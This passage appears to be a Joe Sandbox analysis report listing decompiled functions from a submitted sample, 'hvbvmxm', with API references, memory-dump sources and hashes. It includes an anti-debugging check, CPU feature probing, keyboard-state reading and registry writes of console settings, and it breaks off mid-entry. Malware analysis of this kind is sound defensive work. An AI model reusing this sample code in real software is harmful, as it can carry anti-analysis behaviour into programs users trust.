                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: c9f595f4c12b3c713a793296114e74ee72371fc8dcb2f522ef5c7feb5bf74d21
                                                  • Instruction ID: dac4e714ee62853d945dadcb4c286b01b5b61ff83486e76bb43d3c3e46b120bf
                                                  • Opcode Fuzzy Hash: c9f595f4c12b3c713a793296114e74ee72371fc8dcb2f522ef5c7feb5bf74d21
                                                  • Instruction Fuzzy Hash: 4531E675901218ABCB21DF65DC88BCDBBB4BF08310F5081EAE40CA7291EB749F858F49
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040ED78 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040ED78(int _a4) {
				void* _t14;

				if(E0041141B(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E0040EDFD(_t14, _a4);
				ExitProcess(_a4);
			}




                                                  0x0040ed85
                                                  0x0040eda1
                                                  0x0040eda1
                                                  0x0040edaa
                                                  0x0040edb3

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,0040ED77,?,?,?,?,?,0040DCC5), ref: 0040ED9A
                                                  • TerminateProcess.KERNEL32(00000000,?,0040ED77,?,?,?,?,?,0040DCC5), ref: 0040EDA1
                                                  • ExitProcess.KERNEL32 ref: 0040EDB3
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 5e847e64d47f93f094269ba6c8cc11d0e0f9a2d23a74b6a0331aa0892e6addf5
                                                  • Instruction ID: 52e974c79d60c63c95dc49b22d37d2646a15dda942993e9eb9fef874fb8fadf3
                                                  • Opcode Fuzzy Hash: 5e847e64d47f93f094269ba6c8cc11d0e0f9a2d23a74b6a0331aa0892e6addf5
                                                  • Instruction Fuzzy Hash: E8E0B632000158AFCB516F56DD09A993B6AFF80755F04883AF90596271CF39ED92DA98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040ACAB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E0040ACAB(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr _t65;
				signed int _t66;
				signed int _t68;
				intOrPtr _t73;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t84;
				intOrPtr* _t86;
				signed int _t91;
				signed int _t94;

				_t84 = __edx;
				 *0x421024 =  *0x421024 & 0x00000000;
				 *0x41f630 =  *0x41f630 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v24 = _v24 & 0x00000000;
				 *0x41f630 =  *0x41f630 | 0x00000002;
				 *0x421024 = 1;
				_t86 =  &_v48;
				_push(1);
				asm("cpuid");
				_pop(_t73);
				 *_t86 = 0;
				 *((intOrPtr*)(_t86 + 4)) = 1;
				 *((intOrPtr*)(_t86 + 8)) = 0;
				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
				_v16 = _v48;
				_v8 = _v36 ^ 0x49656e69;
				_v12 = _v40 ^ 0x6c65746e;
				_push(1);
				asm("cpuid");
				_t75 =  &_v48;
				 *_t75 = 1;
				 *((intOrPtr*)(_t75 + 4)) = _t73;
				 *((intOrPtr*)(_t75 + 8)) = 0;
				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
					L9:
					_t91 =  *0x421028; // 0x2
					L10:
					_v32 = _v36;
					_t59 = _v40;
					_v8 = _t59;
					_v28 = _t59;
					if(_v16 >= 7) {
						_t65 = 7;
						_push(_t75);
						asm("cpuid");
						_t77 =  &_v48;
						 *_t77 = _t65;
						 *((intOrPtr*)(_t77 + 4)) = _t75;
						 *((intOrPtr*)(_t77 + 8)) = 0;
						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
						_t66 = _v44;
						_v24 = _t66;
						_t59 = _v8;
						if((_t66 & 0x00000200) != 0) {
							 *0x421028 = _t91 | 0x00000002;
						}
					}
					if((_t59 & 0x00100000) != 0) {
						 *0x41f630 =  *0x41f630 | 0x00000004;
						 *0x421024 = 2;
						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
							asm("xgetbv");
							_v20 = _t59;
							_v16 = _t84;
							if((_v20 & 0x00000006) == 6 && 0 == 0) {
								_t62 =  *0x41f630; // 0x2f
								_t63 = _t62 | 0x00000008;
								 *0x421024 = 3;
								 *0x41f630 = _t63;
								if((_v24 & 0x00000020) != 0) {
									 *0x421024 = 5;
									 *0x41f630 = _t63 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t68 = _v48 & 0x0fff3ff0;
				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
					_t94 =  *0x421028; // 0x2
					_t91 = _t94 | 0x00000001;
					 *0x421028 = _t91;
					goto L10;
				} else {
					goto L9;
				}
			}



























                                                  0x0040acab
                                                  0x0040acae
                                                  0x0040acbc
                                                  0x0040accb
                                                  0x0040ae48
                                                  0x0040ae4e
                                                  0x0040ae4e
                                                  0x0040acd1
                                                  0x0040acd7
                                                  0x0040ace2
                                                  0x0040ace8
                                                  0x0040aceb
                                                  0x0040acec
                                                  0x0040acf0
                                                  0x0040acf1
                                                  0x0040acf3
                                                  0x0040acf6
                                                  0x0040acfb
                                                  0x0040ad04
                                                  0x0040ad15
                                                  0x0040ad20
                                                  0x0040ad26
                                                  0x0040ad27
                                                  0x0040ad2f
                                                  0x0040ad35
                                                  0x0040ad37
                                                  0x0040ad3a
                                                  0x0040ad3d
                                                  0x0040ad40
                                                  0x0040ad85
                                                  0x0040ad85
                                                  0x0040ad8b
                                                  0x0040ad92
                                                  0x0040ad95
                                                  0x0040ad98
                                                  0x0040ad9b
                                                  0x0040ad9e
                                                  0x0040ada2
                                                  0x0040ada5
                                                  0x0040ada6
                                                  0x0040adab
                                                  0x0040adae
                                                  0x0040adb0
                                                  0x0040adb3
                                                  0x0040adb6
                                                  0x0040adb9
                                                  0x0040adc1
                                                  0x0040adc4
                                                  0x0040adc7
                                                  0x0040adcc
                                                  0x0040adcc
                                                  0x0040adc7
                                                  0x0040add9
                                                  0x0040addb
                                                  0x0040ade2
                                                  0x0040adf1
                                                  0x0040adfc
                                                  0x0040adff
                                                  0x0040ae02
                                                  0x0040ae13
                                                  0x0040ae19
                                                  0x0040ae1e
                                                  0x0040ae21
                                                  0x0040ae2f
                                                  0x0040ae34
                                                  0x0040ae39
                                                  0x0040ae43
                                                  0x0040ae43
                                                  0x0040ae34
                                                  0x0040ae13
                                                  0x0040adf1
                                                  0x00000000
                                                  0x0040add9
                                                  0x0040ad45
                                                  0x0040ad4f
                                                  0x0040ad74
                                                  0x0040ad7a
                                                  0x0040ad7d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040ACC4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor
                                                  • String ID:
                                                  • API String ID: 2325560087-3916222277
                                                  • Opcode ID: 0f31f1ac051cff7357700d541dd8a3fb934e405a9f7f0deb270f5a5deba497d9
                                                  • Instruction ID: f566798ac463ad169bc779d5e3272e55cb8cb489a98a76cff77b7a923ed78ee1
                                                  • Opcode Fuzzy Hash: 0f31f1ac051cff7357700d541dd8a3fb934e405a9f7f0deb270f5a5deba497d9
                                                  • Instruction Fuzzy Hash: 8C517DB1D003089BDB24CF69D98569EBBF5FB08314F14817BD808F76A0D3389956CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404020 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00404020(void* __ecx, BYTE* _a4) {
				signed int _v8;

				_v8 = 0;
				GetKeyboardState(_a4);
				if(( *(_a4 + (1 << 4)) & 0x80) != 0) {
					_v8 = _v8 | 0x00000010;
				}
				if((_a4[0xa2] & 0x80) != 0) {
					_v8 = _v8 | 0x00000008;
				}
				if((_a4[0xa3] & 0x80) != 0) {
					_v8 = _v8 | 0x00000004;
				}
				if((_a4[0xa4] & 0x80) != 0) {
					_v8 = _v8 | 0x00000002;
				}
				if((_a4[0xa5] & 0x80) != 0) {
					_v8 = _v8 | 0x00000001;
				}
				if((_a4[0x14] & 1) != 0) {
					_v8 = _v8 | 0x00000080;
				}
				if((_a4[0x90] & 1) != 0) {
					_v8 = _v8 | 0x00000020;
				}
				if((_a4[0x91] & 1) != 0) {
					_v8 = _v8 | 0x00000040;
				}
				return _v8;
			}




                                                  0x00404024
                                                  0x0040402f
                                                  0x00404049
                                                  0x00404051
                                                  0x00404051
                                                  0x0040406c
                                                  0x00404074
                                                  0x00404074
                                                  0x0040408f
                                                  0x00404097
                                                  0x00404097
                                                  0x004040b1
                                                  0x004040b9
                                                  0x004040b9
                                                  0x004040d4
                                                  0x004040dc
                                                  0x004040dc
                                                  0x004040f1
                                                  0x004040fc
                                                  0x004040fc
                                                  0x00404114
                                                  0x0040411c
                                                  0x0040411c
                                                  0x00404134
                                                  0x0040413c
                                                  0x0040413c
                                                  0x00404145

                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 0040402F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState
                                                  • String ID:
                                                  • API String ID: 1724228437-0
                                                  • Opcode ID: 88207723aa0c8e0794195c1b7853b7a0e3712123715cc588a99eaaac9dd39dcb
                                                  • Instruction ID: 262ec3806ea75a0b8bae02f3621129f9f9e8aaa30daa8b7f176cb94f82c166f4
                                                  • Opcode Fuzzy Hash: 88207723aa0c8e0794195c1b7853b7a0e3712123715cc588a99eaaac9dd39dcb
                                                  • Instruction Fuzzy Hash: 80316D70A041489BEB08CF98C5617A9BBB2FB85300F14C0BAE585AF7D5C63A9F40DB44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041273A Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0041273A() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x421ad0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                                  0x0041273a
                                                  0x00412742
                                                  0x0041274a

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  • Opcode ID: 6423bf49c813b52c1af739fede76114f0272a1df1963f5fd1ba8df99edaf2905
                                                  • Instruction ID: 3d5ce7a95b10b5d90c454b6e44bd31d7f76a4a760882723bc95d97f459a7c44d
                                                  • Opcode Fuzzy Hash: 6423bf49c813b52c1af739fede76114f0272a1df1963f5fd1ba8df99edaf2905
                                                  • Instruction Fuzzy Hash: 43A01130202200CB83008F32AA0A2083AAABA882C0B02803CA002C0230EB2080008A0A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B80149 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.311017537.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_b80000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 99f7f8a727c11264525f8cb6de1cb7337fd0f498ccee2e52288f3cdfd2a68309
                                                  • Instruction ID: 15f3aae0866ba897d942bcca4d20c4b909254cb01b08fae255ed31e29ae0b573
                                                  • Opcode Fuzzy Hash: 99f7f8a727c11264525f8cb6de1cb7337fd0f498ccee2e52288f3cdfd2a68309
                                                  • Instruction Fuzzy Hash: 0221A132710218AFD750FF69C8849AEB7E9EFA83A4B148466F846DB311D234DE04CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B8007A Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.311017537.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_b80000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 13604c29325f2004163b2aa178d0763ca0500bc422fb4823b0b3684db1ed90d5
                                                  • Instruction ID: dda985d708535783bcd86315be7b39c80be376a473bcc684958ebf439b3c26ba
                                                  • Opcode Fuzzy Hash: 13604c29325f2004163b2aa178d0763ca0500bc422fb4823b0b3684db1ed90d5
                                                  • Instruction Fuzzy Hash: DEE04F36360649AFCB40EBA8CD81D55B3F8EB08368B144290F916D73E1E674ED00DB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B80019 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.311017537.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_b80000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dc0bda6141fd36cf9d678f032adb249b3112c4c6bd4a6d514cefce2705d38c4d
                                                  • Instruction ID: 007607f7609d368ce51b911081cae6225aedab0ada0bd24c01b61a1cd1cd32dd
                                                  • Opcode Fuzzy Hash: dc0bda6141fd36cf9d678f032adb249b3112c4c6bd4a6d514cefce2705d38c4d
                                                  • Instruction Fuzzy Hash: 9DE04F322209149BC7A2BA59C844D96F7E9EF887F0B0544A5E949A7631C631FC04D790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041141B Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0041141B(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E004123F7(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}






                                                  0x00411428
                                                  0x0041142a
                                                  0x0041142d
                                                  0x00411430
                                                  0x00411433
                                                  0x00411444
                                                  0x00411446
                                                  0x00411435
                                                  0x00411439
                                                  0x00411442
                                                  0x00000000
                                                  0x00000000
                                                  0x00411442
                                                  0x0041144b

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9153446cb6cd44745a40b7f6cb4543bddff00f9c5f0bacd49f36d3320f98c124
                                                  • Instruction ID: ca300cbffba5b4123e4a1514258fb5bd75c6ab346c830727b02bd9d104cc973d
                                                  • Opcode Fuzzy Hash: 9153446cb6cd44745a40b7f6cb4543bddff00f9c5f0bacd49f36d3320f98c124
                                                  • Instruction Fuzzy Hash: 4FE04632911268EBCB15DB99C90498AB2ACEB49B18B15009ABA11D3211C278DE40C7D5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B80005 Relevance: .0, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.311017537.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_b80000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                  • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                  • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                  • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405D50 Relevance: 72.1, APIs: 24, Strings: 17, Instructions: 397registrystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E00405D50(void* _a4, int _a8, intOrPtr _a12) {
				char _v8;
				signed int _v12;
				signed int _v16;
				int _v20;
				short _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v224;
				short _v252;
				long _t189;
				int _t200;
				int _t201;
				signed int _t234;
				void* _t354;
				void* _t355;

				if(_a12 == 0) {
					_t189 = E00404B80(0,  &_v224);
				}
				_v12 = 0;
				while(1) {
					0x400000(_a8);
					if(_v12 >= _t189) {
						break;
					}
					if(_a12 != 0) {
						L7:
						wsprintfW( &_v252, L"ColorTable%02d", _v12);
						_t355 = _t355 + 0xc;
						_v8 =  *(_a8 + _v12 * 4);
						_t189 = RegSetValueExW(_a4,  &_v252, 0, 4,  &_v8, 4);
					} else {
						_t189 =  *(_a8 + _v12 * 4);
						if(_t189 !=  *((intOrPtr*)(_t354 + _v12 * 4 - 0xdc))) {
							goto L7;
						}
					}
					_v12 = _v12 + 1;
				}
				if(_a12 != 0 ||  *(_a8 + 0x48) != _v152) {
					_v8 =  *(_a8 + 0x48);
					RegSetValueExW(_a4, L"CursorSize", 0, 4,  &_v8, 4);
				}
				if(_a12 != 0 ||  *(_a8 + 0x4c) != _v148) {
					_v8 =  *(_a8 + 0x4c);
					RegSetValueExW(_a4, L"CursorVisible", 0, 4,  &_v8, 4);
				}
				if(_a12 != 0 ||  *(_a8 + 0x80) != _v96) {
					_v8 =  *(_a8 + 0x80);
					RegSetValueExW(_a4, L"EditionMode", 0, 4,  &_v8, 4);
				}
				if(_a12 != 0 || lstrcmpW(_a8 + 0x8c,  &_v84) != 0) {
					RegSetValueExW(_a4, L"FaceName", 0, 1, _a8 + 0x8c, lstrlenW(_a8 + 0x8c) + _t196 + 2);
				}
				if(_a12 != 0) {
					L23:
					_v8 =  *(_a8 + 0x84);
					_t200 = RegSetValueExW(_a4, L"FontPitchFamily", 0, 4,  &_v8, 4);
				} else {
					_t200 = _a8;
					if( *((intOrPtr*)(_t200 + 0x84)) != _v92) {
						goto L23;
					}
				}
				if(_a12 != 0) {
					L27:
					__imp__GetDpiForSystem();
					_t201 = MulDiv( *(_a8 + 0x40), 0x60, _t200);
					_v16 = _t201;
					__imp__GetDpiForSystem();
					_v20 = MulDiv( *(_a8 + 0x44), 0x60, _t201);
					_v8 = _v16 & 0xffff | (_v20 & 0xffff) << 0x00000010;
					RegSetValueExW(_a4, L"FontSize", 0, 4,  &_v8, 4);
				} else {
					_t200 = _a8;
					if( *((intOrPtr*)(_t200 + 0x44)) != _v156) {
						goto L27;
					} else {
						_t200 =  *(_a8 + 0x40);
						if(_t200 != _v160) {
							goto L27;
						}
					}
				}
				if(_a12 != 0 ||  *(_a8 + 0x88) != _v88) {
					_v8 =  *(_a8 + 0x88);
					RegSetValueExW(_a4, L"FontWeight", 0, 4,  &_v8, 4);
				}
				if(_a12 != 0 ||  *(_a8 + 0x58) != _v136) {
					_v8 =  *(_a8 + 0x58);
					RegSetValueExW(_a4, L"HistoryBufferSize", 0, 4,  &_v8, 4);
				}
				if(_a12 != 0 ||  *(_a8 + 0x5c) != _v132) {
					_v8 =  *(_a8 + 0x5c);
					RegSetValueExW(_a4, L"HistoryNoDup", 0, 4,  &_v8, 4);
				}
				if(_a12 != 0 ||  *(_a8 + 0x60) != _v128) {
					_v8 =  *(_a8 + 0x60);
					RegSetValueExW(_a4, L"InsertMode", 0, 4,  &_v8, 4);
				}
				if(_a12 != 0 ||  *(_a8 + 0x64) != _v124) {
					_v8 =  *(_a8 + 0x64);
					RegSetValueExW(_a4, L"MenuMask", 0, 4,  &_v8, 4);
				}
				if(_a12 != 0 ||  *(_a8 + 0x54) != _v140) {
					_v8 =  *(_a8 + 0x54);
					RegSetValueExW(_a4, L"PopupColors", 0, 4,  &_v8, 4);
				}
				if(_a12 != 0 ||  *(_a8 + 0x68) != _v120) {
					_v8 =  *(_a8 + 0x68);
					RegSetValueExW(_a4, L"QuickEdit", 0, 4,  &_v8, 4);
				}
				if(_a12 != 0 ||  *(_a8 + 0x6c) != _v116 ||  *(_a8 + 0x70) != _v112) {
					_v8 =  *(_a8 + 0x6c) & 0xffff | ( *(_a8 + 0x70) & 0xffff) << 0x00000010;
					RegSetValueExW(_a4, L"ScreenBufferSize", 0, 4,  &_v8, 4);
				}
				if(_a12 != 0 ||  *(_a8 + 0x50) != _v144) {
					_v8 =  *(_a8 + 0x50);
					RegSetValueExW(_a4, L"ScreenColors", 0, 4,  &_v8, 4);
				}
				if(_a12 != 0 ||  *(_a8 + 0x74) != _v108) {
					L59:
					_v8 =  *(_a8 + 0x74) & 0xffff | ( *(_a8 + 0x78) & 0xffff) << 0x00000010;
					return RegSetValueExW(_a4, L"WindowSize", 0, 4,  &_v8, 4);
				}
				_t234 =  *(_a8 + 0x78);
				if(_t234 != _v104) {
					goto L59;
				}
				return _t234;
			}


































                                                  0x00405d5d
                                                  0x00405d68
                                                  0x00405d68
                                                  0x00405d6d
                                                  0x00405d7f
                                                  0x00405d83
                                                  0x00405d8b
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d91
                                                  0x00405da8
                                                  0x00405db8
                                                  0x00405dbe
                                                  0x00405dca
                                                  0x00405de2
                                                  0x00405d93
                                                  0x00405d9c
                                                  0x00405da6
                                                  0x00000000
                                                  0x00000000
                                                  0x00405da6
                                                  0x00405d7c
                                                  0x00405d7c
                                                  0x00405dee
                                                  0x00405e04
                                                  0x00405e1a
                                                  0x00405e1a
                                                  0x00405e24
                                                  0x00405e3a
                                                  0x00405e50
                                                  0x00405e50
                                                  0x00405e5a
                                                  0x00405e73
                                                  0x00405e89
                                                  0x00405e89
                                                  0x00405e93
                                                  0x00405ed9
                                                  0x00405ed9
                                                  0x00405ee3
                                                  0x00405ef3
                                                  0x00405efc
                                                  0x00405f12
                                                  0x00405ee5
                                                  0x00405ee5
                                                  0x00405ef1
                                                  0x00000000
                                                  0x00000000
                                                  0x00405ef1
                                                  0x00405f1c
                                                  0x00405f3a
                                                  0x00405f3a
                                                  0x00405f4a
                                                  0x00405f50
                                                  0x00405f53
                                                  0x00405f69
                                                  0x00405f89
                                                  0x00405f9f
                                                  0x00405f1e
                                                  0x00405f1e
                                                  0x00405f2a
                                                  0x00000000
                                                  0x00405f2c
                                                  0x00405f2f
                                                  0x00405f38
                                                  0x00000000
                                                  0x00000000
                                                  0x00405f38
                                                  0x00405f2a
                                                  0x00405fa9
                                                  0x00405fc2
                                                  0x00405fd8
                                                  0x00405fd8
                                                  0x00405fe2
                                                  0x00405ff8
                                                  0x0040600e
                                                  0x0040600e
                                                  0x00406018
                                                  0x0040602b
                                                  0x00406041
                                                  0x00406041
                                                  0x0040604b
                                                  0x0040605e
                                                  0x00406074
                                                  0x00406074
                                                  0x0040607e
                                                  0x00406091
                                                  0x004060a7
                                                  0x004060a7
                                                  0x004060b1
                                                  0x004060c7
                                                  0x004060dd
                                                  0x004060dd
                                                  0x004060e7
                                                  0x004060fa
                                                  0x00406110
                                                  0x00406110
                                                  0x0040611a
                                                  0x00406155
                                                  0x0040616b
                                                  0x0040616b
                                                  0x00406175
                                                  0x0040618b
                                                  0x004061a1
                                                  0x004061a1
                                                  0x004061ab
                                                  0x004061c3
                                                  0x004061e6
                                                  0x00000000
                                                  0x004061fc
                                                  0x004061bb
                                                  0x004061c1
                                                  0x00000000
                                                  0x00000000
                                                  0x00406205

                                                  APIs
                                                  • wsprintfW.USER32 ref: 00405DB8
                                                  • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,00000001,00000004), ref: 00405DE2
                                                  • RegSetValueExW.ADVAPI32(00000000,CursorSize,00000000,00000004,00000001,00000004), ref: 00405E1A
